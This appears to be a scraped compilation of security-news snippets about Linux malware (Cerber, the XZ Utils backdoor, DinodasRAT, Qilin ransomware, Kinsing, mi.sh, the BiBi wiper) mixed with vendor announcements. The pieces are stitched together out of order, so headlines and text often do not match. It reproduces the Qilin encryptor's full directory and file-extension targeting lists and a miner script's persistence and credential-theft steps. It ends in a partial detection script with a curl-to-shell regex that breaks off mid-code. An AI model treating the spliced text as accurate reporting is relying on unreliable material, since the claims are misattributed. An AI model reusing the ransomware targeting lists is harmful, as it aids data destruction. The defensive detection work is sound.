Linux variant of Cerber ransomware targets Atlassian servers
Pierluigi Paganini, April 17, 2024
Threat actors are exploiting the CVE-2023-22518 flaw in Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware.
The attacks, codenamed Heckler and WeSee, make use of malicious interrupts to break the integrity of CVMs, potentially allowing threat actors to remotely log in and gain elevated access, as well as perform arbitrary read, write, and code injection to disable firewall rules and open a root shell.
Two attack methods are Branch Target Injection (BTI), which involves manipulating the CPU's branch prediction to execute unauthorized code paths, and Branch History Injection (BHI), which manipulates branch history to cause speculative execution of chosen gadgets (code paths), leading to data leakage. As the CERT Coordination Center (CERT/CC) disclosed yesterday, the new flaw, tracked as CVE-2024-2201, allows unauthenticated attackers to read arbitrary memory data by leveraging speculative execution, bypassing present security mechanisms designed to isolate privilege levels.
"It modifies ifunc calls to replace a check "is_arch_extension_supported" which should simply invoke "cpuid" to insert a call to "_get_cpuid" which is exported by the payload object file (i.e., liblzma_la-crc64-fast.o) and which calls malformed _get_cpuid() which is implanted into the code shown in the figure below."
"The most notable part of this supply chain attack is the extreme levels of dedication of the attacker, working more than two years to establish themselves as a legitimate maintainer, offering to pick up work in various OSS projects and committing code across multiple projects in order to avoid detection," JFrog said.
The malware's execution logic (Kaspersky)
The infected machine is tagged using infection, hardware, and system details and the report is sent to the command and control (C2) server to manage victim hosts.
The news that XZ Utils, a compression utility present in most Linux distributions, has been backdoored by a supposedly trusted maintainer has rattled the open-source software community on Friday, mere hours until the beginning of a long weekend for many. Nearly two days have passed since then. What do we currently know about the entire affair?
The discovery
The backdoor was discovered by Andres Freund, a software engineer at Microsoft, when testing some things on …
The post XZ Utils backdoor update: Which Linux distros are affected and what can you do? appeared first on Help Net Security.
XZ Utils was authored by and is still led by Lasse Collin, but the backdoor was introduced by someone that went by “Jia Tan” (JiaT75 on GitHub), who became – over several years, with the help of sock puppet accounts and trust-building via social engineering – a prolific maintainer of the software, and did other things to keep the existence of the backdoor under wraps. Debian maintainers announced that “no Debian stable versions are known to be affected”, but that compromised packages were part of the Debian testing, unstable and experimental distributions, and users of those “are urged to update the xz-utils packages.”
DinodasRAT Linux variant targets users worldwide
Pierluigi Paganini, March 31, 2024
A Linux variant of the DinodasRAT backdoor is being used in attacks against users in China, Taiwan, Turkey, and Uzbekistan, researchers from Kaspersky warn. Researchers from Kaspersky uncovered a Linux version of a multi-platform backdoor DinodasRAT that was employed in attacks targeting China, Taiwan, Turkey, and Uzbekistan. “Instead, hardware-specific information is collected and used to generate a UID, demonstrating that DinodasRAT’s primary use case is to gain and maintain access via Linux servers rather than reconnaissance,” concludes the report. The UID typically includes the date of infection, the MD5 hash of the dmidecode command output (a detailed report of the infected system’s hardware), a randomly generated number as ID, and the backdoor version.
“Compromised packages were part of the Debian testing, unstable and experimental distributions, with versions ranging from 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1,” reads the advisory.
"wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads.
Red Hat reverts to XZ 5.4.x in Fedora Beta
Red Hat is now tracking this supply chain security issue as CVE-2024-3094, assigned it a 10/10 critical severity score, and reverted to 5.4.x versions of XZ in Fedora 40 beta.
A vulnerability (CVE-2024-3094) in XZ Utils, the XZ format compression utilities included in most Linux distributions, may “enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely,” Red Hat warns. The cause of the vulnerability is actually malicious code present in versions 5.6.0 (released in late February) and 5.6.1 (released on March 9) of the xz libraries, which was accidentally found by Andres Freund, a PostgreSQL developer and …
The post Beware! Backdoor found in XZ utilities used by many Linux distros (CVE-2024-3094) appeared first on Help Net Security.
“Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the “fixes” [for errors caused by the injected code in v5.6.0],” Freund commented. “Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by Linux distributions, and where they have, mostly in pre-release versions.”
"Since we can send escape sequences through wall, if a user is using a terminal that supports this escape sequence, an attacker can change the victim's clipboard to arbitrary text," Ferrante details.
During last year's Vancouver Pwn2Own, won by Team Synacktiv, hackers earned $1,035,000 and a Tesla car for 27 zero-days (and several bug collisions) in Windows 11, Microsoft Teams, Microsoft SharePoint, macOS, Ubuntu Desktop, VMware Workstation, Oracle VirtualBox, and Tesla's Model 3.
Code execution is needed because global themes are designed to change everything on a Plasma desktop, from icons to window decorations, lock screens, splash screens, wallpapers, color schemes, and so on, using executable bash scripts. On Wednesday, the KDE team warned Linux users to exercise "extreme caution" when installing global themes, even from the official KDE Store, because these themes run arbitrary code on devices to customize the desktop's appearance.
SUSE announced enhancements across its cloud native and Edge portfolio to enable customers to securely deploy and manage business-critical workloads anywhere. New capabilities in Rancher Prime 3.0, SUSE’s commercial offering of Rancher and SUSE Edge 3.0 commit to enabling choice and providing secure platforms through 100 percent open source solutions. “At SUSE, our commercial and open source users are equally important,” said Peter Smails, GM of the SUSE Enterprise Container Management business unit. “As such, …
The post SUSE announces new enhancements to help users manage business-critical workloads appeared first on Help Net Security.
SUSE is also introducing Rancher Enterprise, a single package and price for the entire portfolio of Rancher Prime including multi-cluster management, OS management, VM management, persistent storage, and SUSE’s certified Linux OS, SUSE Linux Enterprise Micro.
Security and lifecycle management, enabling self-service PaaS with Rancher Prime
New capabilities in Rancher Prime 3.0 help platform engineering teams deliver self-service Platform-as-a-Service (PaaS) to their developer communities, and enhanced support for AI workloads.
Code comparison showing functional similarities (@juanandres_gs)
AcidPour shares input/output control (IOCTL)-based wiping logic with VPNFilter's "dstr" plugin and AcidRain, indicating a continuation or adaptation of the previously documented malicious techniques.
— J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024
Some code entries such as ‘/dev/ubiXX’ (refers to Unsorted Block Images (UBI)) and ‘/dev/dm-XX’ suggest the malware can target systems utilizing flash memory like IoT devices, networking devices, and possibly some ICS devices along with virtual block devices associated with LVM.
AcidPour uses a similar IOCTL based wiping logic as VPNFilter "dstr" plugin and AcidRain pic.twitter.com/hzVytibRba
— J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024
Analogous to AcidRain, there appears to be a different wiping logic for borking certain devices like /dev/dmXX (LVMs, likely RAIDs).
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos:
Transitioning to memory-safe languages: Challenges and considerations
In this Help Net Security interview, Omkhar Arasaratnam, General Manager at the Open Source Security Foundation (OpenSSF), discusses the evolution of memory-safe programming languages and their emergence in response to the limitations of languages like C and C++.
LastPass’ CIO vision for driving business strategy, innovation
Recently, LastPass appointed Asad Siddiqui as its …
The post Week in review: Cybersecurity job openings, hackers use 1-day flaws to drop custom Linux malware appeared first on Help Net Security.
Keyloggers, spyware, and stealers dominate SMB malware detections
In 2023, 50% of malware detections for SMBs were keyloggers, spyware and stealers, malware that attackers use to steal data and credentials, according to Sophos.
A financially motivated threat actor is using known vulnerabilities to target public-facing services and deliver custom malware to unpatched Windows and Linux systems. Among the exploited vulnerabilities are also two recently discovered Ivanti Connect Secure VPN flaws that are widely exploited by a variety of attackers.
Magnet Goblin activity
Magnet Goblin – as the threat actor has been dubbed by Check Point researchers – has been targeting unpatched edge devices and public-facing servers for years. …
The post Hackers leverage 1-day vulnerabilities to deliver custom Linux malware appeared first on Help Net Security.
These include: Magento – CVE-2022-24086; Qlik Sense – CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365; Ivanti Connect Secure – CVE-2023-46805 and CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893. The researchers also observed a simplified version of the NerbianRAT, called MiniNerbian, which supports the following actions:
Execute C2’s command and return results
Update activity schedule (full day or specific hours)
Update configuration
Unlike NerbianRAT, MiniNerbian uses HTTP protocol for C2 communication.
Configuration parameters (Source: Check Point)
The C2 may send one of the following actions to the malware for execution at the infected system:
Request more actions
Execute a Linux command in a new thread
Send command result and clean the file; stop any running commands
Execute a Linux command immediately
Do nothing
Modify connection interval
Adjust and save worktime settings
Return idle timings, config, or command results
Update a specific config variable
Refresh command buffer for C2 execution commands
The MiniNerbian is a simplified version of the NerbianRAT, which is primarily used for command execution and supports the following actions:
Execute C2's command and return results
Update activity schedule (full day or specific hours)
Update configuration
MiniNerbian communicates with the C2 via HTTP, differentiating it from the more complex NerbianRAT, which uses raw TCP sockets for communication.
Linux Malware targets misconfigured Apache Hadoop, Confluence, Docker, and Redis servers
Pierluigi Paganini, March 07, 2024
A new Linux malware campaign is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances.
At the end of February, Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver.
New Linux variant of BIFROSE RAT uses deceptive domain strategies
Pierluigi Paganini, March 04, 2024
A new Linux variant of the remote access trojan (RAT) BIFROSE (aka Bifrost) uses a deceptive domain mimicking VMware.
GTPDOOR v1 supports the following operations on breached hosts:
Set a new encryption key used for C2 communications
Write arbitrary data to a local file named "system.conf"
Execute arbitrary shell commands and send back the output
GTPDOOR v2 supports the above operations plus the following:
Specify IP addresses or subnets allowed to communicate with the compromised host through an Access Control List (ACL) mechanism.
"With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more," Avast explained.
The malware has been put to use by a state-backed hacking group from China tracked as BlackTech (aka Circuit Panda, HUAPI, Manga Taurus, Palmerworm, PLEAD, Red Djinn, and Temp.
Lazarus APT exploited zero-day in Windows driver to gain kernel privileges
Pierluigi Paganini, February 29, 2024
North Korea-linked Lazarus APT exploited a zero-day flaw in the Windows AppLocker driver (appid.sys) to gain kernel-level access to target systems.
OffSec has released Kali Linux 2024.1, the latest version of its popular penetration testing and digital forensics platform. The new version comes with new tools, a fresh look (themes, wallpapers and icons for Kali and Kali Purple), a new image viewer for the Gnome desktop and a usability enhancement to the Xfce desktop (the ability to copy one’s VPN IP address to the clipboard with just a click), and updates for the Kali NetHunter mobile …
The post Kali Linux 2024.1 released: New tools, new look, new Kali Nethunter kernels appeared first on Help Net Security.
Cybersecurity vendor Avast, which discovered an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit."
Below are the four new tools added in Kali 2024.1:
blue-hydra - Bluetooth device discovery service
opentaxii - TAXII server implementation from EclecticIQ
readpe - Command-line tools to manipulate Windows PE files
snort - Flexible Network Intrusion Detection System
In addition to the new tools, Kali says they upgraded the Kernel version to 6.6.
Direct syscalls used in the exploit (Avast)
The FudModule rootkit, built within the same module as the exploit, executes direct kernel object manipulation (DKOM) operations to turn off security products, hide malicious activities, and maintain persistence on the breached system.
The Federal Trade Commission will require software provider Avast to pay $16.5 million and prohibit the company from selling or licensing any web browsing data for advertising purposes to settle charges that the company and its subsidiaries sold such information to third parties after promising that its products would protect consumers from online tracking. In its complaint, the FTC says that Avast, based in the United Kingdom, through its Czech subsidiary, unfairly collected consumers’ browsing …
The post Avast ordered to pay $16.5 million for misuse of user data appeared first on Help Net Security.
For example, as alleged in the complaint, Jumpshot entered into a contract with Omnicom, an advertising conglomerate, which stated that Jumpshot would provide Omnicom with an “All Clicks Feed” for 50% of its customers in the United States, United Kingdom, Mexico, Australia, Canada, and Germany.
Major Linux distributions such as Debian, Red Hat, SUSE, and Ubuntu have released advisories for the two flaws.
In an alert published yesterday, web infrastructure company Akamai said it has observed "significant scanning activity" targeting CVE-2024-22024 starting February 9, 2024, following the publication of a proof-of-concept (PoC) by watchTowr.
The first and most simple trick is to associate commands containing typing errors (e.g., "ifconfigg" instead of "ifconfig") with malicious snap packages, leading the "command-not-found" utility to suggest the installation of malware to the user, who is unlikely to realize their typo at that point.
Typo-squatting and impersonation risks
All the above lays the ground for a risky situation as long as attackers find a way to promote their packages through the "command-not-found" utility, but as the analysts explain, there's a comfortable margin for that, too.
"This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named 'jupyter-notebook'." To make matters worse, the command-not-found utility suggests the snap package above the legitimate APT package for jupyter-notebook, misleading users into installing the fake snap package.
Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages
Pierluigi Paganini, February 14, 2024
Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems.
Though there are organizations out there investigating how commercial spyware is misused to target journalists, human rights defenders and dissidents, the growing market related to the development and sale of this type of software and the exploits used to deploy it is still very much shrouded in mystery. “While prominent [commercial spyware vendors] garner public attention and headlines, there are dozens of others that are less noticed, but play an important role in developing spyware,” …
The post The fight against commercial spyware misuse is heating up appeared first on Help Net Security.
In related news, on Monday, US Secretary of State Antony Blinken announced that the State Department is implementing a new policy that will allow the imposition of visa restrictions on:
Individuals involved in the misuse of commercial spyware to surveil, harass, or intimidate “journalists, activists, other persons perceived to be dissidents for their work, members of marginalized communities or vulnerable populations, or the family members of these targeted individuals”
Individuals believed to facilitate or derive financial benefit from such misuse of commercial spyware (e.g., commercial spyware vendors, and brokers)
Linux distributions that utilize Shim, such as Red Hat, Debian, Ubuntu, and SUSE, have released advisories with information on the flaw.
found a critical bug that exists in every Linux boot loader signed in the past decade 🥰 https://t.co/kjATsR4uvJ https://t.co/JrECpgGmWD pic.twitter.com/oKEl7PTUSp
— Bill Demirkapi (@BillDemirkapi) January 24, 2024
“Discovered and reported by Bill Demirkapi at Microsoft’s Security Response Center, this particular vulnerability stems from HTTP protocol handling, leading to an out-of-bounds write that can lead to complete system compromise.”
IBM announced IBM LinuxONE 4 Express, extending the latest performance, security and AI capabilities of LinuxONE to small and medium sized businesses and within new data center environments. The pre-configured rack mount system is designed to offer cost savings and to remove client guess work when spinning up workloads quickly and getting started with the platform to address new and traditional use cases such as digital assets, medical imaging with AI, and workload consolidation. Building …
The post IBM LinuxONE 4 Express protects sensitive private data appeared first on Help Net Security.
Activating the IBM Ecosystem for client success
With the IBM LinuxONE Ecosystem, including AquaSecurity, Clari5, Exponential AI, Opollo Technologies, Pennant and Spiking, IBM is working to provide solutions for today’s sustainability and cybersecurity challenges. “IBM brings the power of hybrid cloud and AI in the latest LinuxONE 4 system to a simple, easy to use format that fits in many data centers,” said Tina Tarquinio, VP, Product Management, IBM Z and LinuxONE.
However, the sudo settings provide some clues as to how the command will work, with the ability to run sudo applications "In a new window", "With input disabled", and "Inline".
Root access vulnerability in GNU Library C (glibc) impacts many Linux distros
Pierluigi Paganini, January 30, 2024
Qualys researchers discovered a root access flaw, tracked as CVE-2023-6246, in GNU Library C (glibc) affecting multiple Linux distributions.
Tsurugi Linux is a heavily customized open-source distribution focused on supporting DFIR investigations. The project focuses mainly on live forensics analysis, post-mortem analysis, and digital evidence acquisition. Users can also perform malware analysis, OSINT and computer vision activities. “We’ve crafted a user-friendly experience, organizing the main menu in a logical forensic analysis sequence. Our menu is your roadmap from device acquisition to integrity checks, artifact extraction, and reporting tools. It’s not just about familiarity; it’s …
The post Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations appeared first on Help Net Security.
“And for the seasoned experts, every tool is at your fingertips, ready to be wielded precisely through the command line console,” Giovanni Rattaro, Tsurugi Linux core developer, told Help Net Security.
AuthLogParser is an open-source tool tailored for digital forensics and incident response, specifically crafted to analyze Linux authentication logs (auth.log). The tool examines the auth.log file, extracting crucial details like SSH logins, user creations, event names, IP addresses, among others. It produces a concise summary that offers a clear overview of the activities documented in the authentication logs, presenting the information in a format that is easy to read.
AuthLogParser features
“AuthLogParser’s distinctiveness lies in …
The post AuthLogParser: Open-source tool for analyzing Linux authentication logs appeared first on Help Net Security.
Users groups activity events Successful SSH Password Authentication Successful SSH Public key Authentication New User Creation Activity User Deletion Activity User Password Change Activity New Group Creation Activity Group Deletion Activity User Added To A Group Activity User Removed From A Group Activity Session Opened For User root General activity events Machine Shutdown By Power Button Future plans In forthcoming iterations, the creator wants to elevate AuthLogParser beyond its initial success as a proof of concept. "Autosummary:
Experts analyzed attacks against poorly managed Linux SSH servers. Pierluigi Paganini, December 27, 2023. Researchers warn of attacks against poorly managed Linux SSH servers that mainly aim at installing a DDoS bot and a CoinMiner.
"In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week.

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Advanced ransomware campaigns expose need for AI-powered cyber defense. In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. SessionProbe: Open-source multi-threaded pentesting tool. SessionProbe is a multi-threaded pentesting … More
The post Week in review: Booking.com hotel booking scam, Kali Linux 2023.4 released appeared first on Help Net Security.
New infosec products of the week: December 8, 2023. Here’s a look at the most interesting products from the past week, featuring releases from Atsign, Daon, Global Integrity, Living Security, Panther Labs, Searchlight Cyber, and Varonis.
Threat actors could propagate the threat by exploiting vulnerabilities in Internet-facing systems, conducting credential brute force attacks, and tricking victims into downloading deceptive packages or binaries (i.e., files masquerading as product updates) from untrustworthy third-party sources.
When communicating with the command and control (C2) server, Krasue can accept the following commands:
- ping – Reply with `pong`
- master – Set the master upstream C2
- info – Get information about the malware: main pid, child pid, and its status such as “root: gained root permissions,” “god: process is unable to be killed,” “hidden: process is hidden,” “module: rootkit is loaded”
- restart – Restart child process
- respawn – Restart main process
- god die – Kill itself

Group-IB discovered nine distinct C2 IP addresses hardcoded into the malware, with one using port 554, which is common in RTSP (Real Time Streaming Protocol) connections.
Among the fifteen new tools added in Kali 2023.4:
- cabby - TAXII client implementation
- cti-taxii-client - TAXII 2 client library
- enum4linux-ng - Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool)
- exiflooter - Finds geolocation on all image URLs and directories
- h8mail - Email OSINT & Password breach hunting tool
- Havoc - Modern and malleable post-exploitation command and control framework
- OpenTAXII - TAXII server implementation
- PassDetective - Scans shell command history to detect mistakenly written passwords, API keys, and secrets
- Portspoof - All 65535 TCP ports are always open & emulates services
- Raven - Lightweight HTTP file upload service
- ReconSpider - Most Advanced Open Source Intelligence (OSINT) Framework

OffSec (previously Offensive Security) has released Kali Linux 2023.4, the latest version of its penetration testing and digital forensics platform. New tools in Kali Linux 2023.4: The list of tools freshly added to Kali Linux includes: cabby – a TAXII client implementation; cti-taxii-client – a TAXII 2 client library; enum4linux-ng – Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool); exiflooter – Finds geolocation info on all image URLs and directories; h8mail … More
The post Kali Linux 2023.4 released: New tools, Kali for Raspberry Pi 5, and more! appeared first on Help Net Security.
In the sample analyzed by BleepingComputer.com, the encryptor is configured by default with the following exclusions and targeting criteria:

Processes to not terminate: "kvm", "qemu", "xen"

Directories to exclude from encryption: "/boot/", "/proc/", "/sys/", "/run/", "/dev/", "/lib/", "/etc/", "/bin/", "/mbr/", "/lib64/", "/vmware/lifecycle/", "/vdtc/", "/healthd/"

Files to exclude from encryption: "initrd", "vmlinuz", "basemisc.tgz", "boot.cfg", "bootpart.gz", "features.gz", "imgdb.tgz", "jumpstrt.gz", "onetime.tgz", "state.tgz", "useropts.gz"

File extensions to exclude from encryption: "v00", "v01", "v02", "v03", "v04", "v05", "v06", "v07", "v08", "v09", "b00", "b01", "b02", "b03", "b04", "b05", "b06", "b07", "b08", "b09", "t00", "t01", "t02", "t03", "t04", "t05", "t06", "t07", "t08", "t09"

The excluded file names and extensions (boot.cfg, state.tgz, imgdb.tgz and the v0x/b0x/t0x boot modules) are the contents of a VMware ESXi boot bank, so the hypervisor still boots after its datastores have been encrypted; the excluded directories likewise keep a general-purpose Linux host running.

Directories to target for encryption: "/home", "/usr/home", "/tmp", "/var/www", "/usr/local/www", "/mnt", "/media", "/srv", "/data", "/backup", "/var/lib/mysql", "/var/mail", "/var/spool/mail", "/var/vm", "/var/lib/vmware", "/opt/virtualbox", "/var/lib/xen", "/var/opt/xen", "/kvm", "/var/lib/docker", "/var/lib/libvirt", "/var/run/sr-mount", "/var/lib/postgresql", "/var/lib/redis", "/var/lib/mongodb", "/var/lib/couchdb", "/var/lib/neo4j", "/var/lib/cassandra", "/var/lib/riak", "/var/lib/influxdb", "/var/lib/elasticsearch"

File extensions to target for encryption: "3ds", "3g2", "3gp", "7z", "aac", "abw", "ac3", "accdb", "ai", "aif", "aiff", "amr", "apk", "app", "asf", "asx", "atom", "avi", "bak", "bat", "bmp", "bup", "bz2", "cab", "cbr", "cbz", "cda", "cdr", "chm", "class", "cmd", "conf", "cow", "cpp", "cr2", "crdownload", "cs", "csv", "cue", "cur", "dat", "db", "dbf", "dds", "deb", "der", "desktop", "dmg", "dng", "doc", "docm", "dot", "dotm", "dotx", "dpx", "drv", "dtd", "dvi", "dwg", "dxf", "eml", "eps", "epub", "f4v", "fnt", "fon", "gam", "ged", "gif", "gpx", "gz", "h264", "hdr", "hpp", "hqx", "htm", "html", "ibooks", "ico", "ics", "iff", "image", "img", "indd", "iso", "jar", "java", "jfif", "jpe", "jpeg", "jpf", "jpg", "js", "json", "jsp", "key", "kml", "kmz", "log", "m4a", "m4b", "m4p", "m4v", "mcd", "mdbx", "mht", "mid", "mkv", "ml", "mobi", "mov", "mp3", "mp4", "mpa", "mpeg", "mpg", "msg", "nes", "numbers", "odp", "ods", "odt", "ogg", "ogv", "otf", "ova", "ovf", "pages", "parallels", "pcast", "pct", "pdb", "pdf", "pds", "pef", "php", "pkg", "pl", "plist", "png", "pptm", "prproj", "ps", "psd", "ptx", "py", "qcow", "qcow2", "qed", "qt", "r3d", "ra", "rar", "rm", "rmvb", "rtf", "rv", "rw2", "sh", "shtml", "sit", "sitx", "sketch", "spx", "sql", "srt", "svg", "swf", "tar", "tga", "tgz", "thmx", "tif", "tiff", "torrent", "ttf", "txt", "url", "vdi", "vhd", "vhdx", "vmdk", "vmem", "vob", "vswp", "vvfat", "wav", "wbmp", "webm", "webp", "wm", "wma", "wmv", "wpd", "wps", "xhtml", "xlsm", "xml", "xspf", "xvid", "yaml", "yml", "zip", "zipx"

Configuring a list of virtual machines that should not be encrypted is also possible.

The Qilin ransomware operation: The Qilin ransomware operation was initially launched as "Agenda" in August 2022.

Canonical announced chiselled Ubuntu containers which come with Canonical’s security maintenance and support commitment. Chiselled Ubuntu containers are ultra-small OCI images that deliver only the application and its runtime dependencies, and no other operating system-level packages, utilities, or libraries. This makes them lightweight to maintain and operate, secure, and efficient in resource utilisation. Canonical’s chiselled Ubuntu portfolio includes pre-built images for popular toolchains like Java, .NET and Python. The company has been working closely with … More
The post Chiselled Ubuntu closes prevailing container security gaps appeared first on Help Net Security.
Key benefits include:
- Bug-for-bug compatibility of containers and their contents from developer experience through DevOps and DevSecOps to production, as all the containers are built from the same package contents
- Smaller containers mean fewer dependency headaches across the container CI lifecycle
- Chisel CLI for an easy, Ubuntu-like experience as customers build or extend chiselled containers themselves using the same tools as Canonical
- Simple images mean simpler image rebuilds
- Reliable support and release cadence: chiselled Ubuntu images inherit Ubuntu’s long-term support guarantees and are updated within the same release cycle using the same packages as other LTS components

Trusted provenance, optimal developer experience. According to GitLab’s 2022 Global DevSecOps Survey, only 64% of security professionals had a security plan for containers, and many DevOps teams don’t have a plan in place for other cutting-edge software technologies, including cloud-native/serverless, APIs, and microservices.
“We have successfully identified and exploited this vulnerability (a local privilege escalation that grants full root privileges) on the default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13,” reads the post published by Qualys.
"With the capability to provide full root access on popular platforms like Fedora, Ubuntu, and Debian, it's imperative for system administrators to act swiftly," Qualys' Saeed Abbasi warned.
BiBi's commands stored in reverse writing order to evade detection (BlackBerry)

BiBi for Windows targets all file types except for .EXE, .DLL, and .SYS files, likely because destroying them would render the computer unusable, and the hacktivists wouldn't be able to relay their message.

Cloud computing carries many benefits for your business… as long as you can ensure the performance and availability of your cloud environments. Let’s take the following three cloud computing benefits as examples. Rapidly scale cloud services: In the absence of performance and availability, you can’t reliably scale your cloud computing services to fit your needs. This means that your organization could miss out on taking advantage of certain resources, or it might need to pay … More
The post Uphold Linux systems’ performance and availability in Azure appeared first on Help Net Security.
With this testing period over, Azure Monitor Agent is now validated for successful deployment and overall functionality (end-to-end data flow for all data types) on images for the following CIS Benchmarks:
- CIS Red Hat Enterprise Linux 7 Benchmark Level 1
- CIS Red Hat Enterprise Linux 7 Benchmark Level 2
- CIS Red Hat Enterprise Linux 8 Benchmark Level 1
- CIS Red Hat Enterprise Linux 8 Benchmark Level 2
- CIS Ubuntu Linux 20.04 LTS Benchmark Level 1
- CIS CentOS Linux 7 Benchmark Level 1
- CIS Debian Linux 10 Benchmark Level 1
- CIS Oracle Linux 8 Benchmark Level 1

What’s more, the Azure team has integrated CIS Hardened Images into the pre-release validation process for continual re-validation when new AMA versions become available.

SUSE released Rancher Prime 2.0, enhancing customers’ ability to manage heterogeneous, multi-cloud Kubernetes deployments securely and at scale. SUSE also revealed updates to Rancher community edition, SLE Micro 5.5 and the future of SUSE Edge. The latest updates continue to meet the diverse needs of the developer while furthering SUSE’s mission to provide choice. “With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for … More
The post SUSE boosts cloud native portfolio to enhance customer productivity appeared first on Help Net Security.
“With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for their entire infrastructure including data center, multiple clouds, and the Edge,” said Peter Smails, general manager of Enterprise Container Management, SUSE.

Helping customers get more value from Kubernetes with Rancher Prime 2.0: Interoperable by design, Rancher Prime 2.0, SUSE’s commercial enterprise subscription, delivers even more value and support for customers. Tighter portfolio integration and new UI extensions (UIE): UI extensions simplify operations and enhance user productivity by building the functionality of SUSE and third-party tools directly into the Rancher Prime UI.
CVE-2017-9841 exploitation (AquaSec)

Exploiting the PHPUnit flaw (CVE-2017-9841) leads to opening a reverse shell over port 1337 on the compromised system, which Kinsing operators leverage to execute reconnaissance commands like "uname -a" and "passwrd."
A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper. During a forensics investigation, Security Joes Incident Response team discovered a new Linux Wiper malware they tracked as BiBi-Linux Wiper. Pro-Hamas hacktivist group used the wiper to destroy the infrastructure of Israeli companies. The researchers noticed that the malware […]
The post Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper appeared first on Security Affairs.
Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper. Pierluigi Paganini, November 01, 2023. A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper.

Attackers have started using new wiper malware called BiBi-Linux to attack Israeli companies and destroy their data. The BiBi-Linux wiper: The Security Joes Incident Response team found the malware during a forensics investigation of a breach within an Israeli company. “This malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions,” Security Joes researchers … More
The post BiBi-Linux wiper targets Israeli companies appeared first on Help Net Security.
“During execution, it produces extensive [terminal] output, which can be mitigated using the ‘nohup’ command.
The malware reveals its true nature by not dropping a ransom note or providing victims with a way to reach out to the attackers to negotiate payment for a decryptor, even though it fakes file encryption. "This new threat does not establish communication with remote Command & Control (C2) servers for data exfiltration, employ reversible encryption algorithms, or leave ransom notes as a means to coerce victims into making payments," said Security Joes.
After investigating the injected code, they determined it downloads and executes additional files, such as PowerShell scripts, from legitimate hosting services like Bitbucket, GitHub, and GitLab. It achieves persistence using systemd services, an autostarting .desktop file, or by modifying various profile and startup files, such as /etc/rc*, profile, bashrc, or inittab. "The malware payload encompasses multiple modules, enabling the actor to perform as an APT, as a crypto miner, and even as a ransomware group," reads Kaspersky's report.
These scripts are listed below:

Structure of the image's filesystem (Source: Unit 42)

The "controller" uses the bundled configuration file, which provides access tokens, victim credentials, and authentication secrets, as well as configuration directives, folder and file blocklists, tasks to run, and hosts to target for encryption.
The script is responsible for most of the malicious activity on a compromised Linux server, including the following:
- Download and run an XMRig miner disguised as "python-dev"
- Set up four cron jobs (apache2, apache2.2, netns, netns2) for the miner's and script's persistence
- Insert an attacker-controlled SSH key for persistent root access
- Install the "Diamorphine" LKM (loadable kernel module) rootkit that helps hide specific processes from monitoring tools
- Steal credentials from the breached endpoint and spread via SSH

Cado reports that mi.sh also performs some attack-optimization steps using an additional component named "kthreadd," such as detecting competing miners in the list of running processes and killing them, and using the "netstat" utility to shut connections to IPs flagged for cryptojacking.
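The persistence mechanisms in the two items above (the Kaspersky-analyzed malware's systemd units, autostart .desktop files and edits to /etc/rc*, profile, bashrc and inittab; mi.sh's disguised `python-dev` miner, its four cron job names, the planted SSH key and the Diamorphine LKM) can all be hunted from one host snapshot. The following is an added example of my own, not code from Cado, Kaspersky or this page. The process name, cron job names and module name come from the text; the startup-file heuristics (download piped to a shell, base64 decoding, anything under /tmp or /dev/shm) are my own generic choices; the snapshot, the "baseline" key blob and the IP address are constructed for the example.

```python
import glob
import os
import re
import subprocess

# Indicators lifted from the write-ups above: mi.sh's miner process name, its
# four cron job names and the Diamorphine LKM. The startup-file heuristics
# (download-and-pipe-to-shell, base64 decoding, /tmp paths) are my own
# generic choices for this example, not something the page states.
MINER_PROCESS_NAMES = {"python-dev"}
SUSPECT_CRON_NAMES = {"apache2", "apache2.2", "netns", "netns2"}
ROOTKIT_MODULES = {"diamorphine"}
DOWNLOADER_RE = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b|base64\s+(?:-d|--decode)\b|/tmp/\S+|/dev/shm/\S+"
)

def analyze(snapshot, known_key_blobs):
    """Return a list of findings for one host snapshot (see collect_live for its shape)."""
    findings = []

    # 1. XMRig disguised under a build-package name.
    for line in snapshot["ps"].splitlines()[1:]:           # skip the ps header
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
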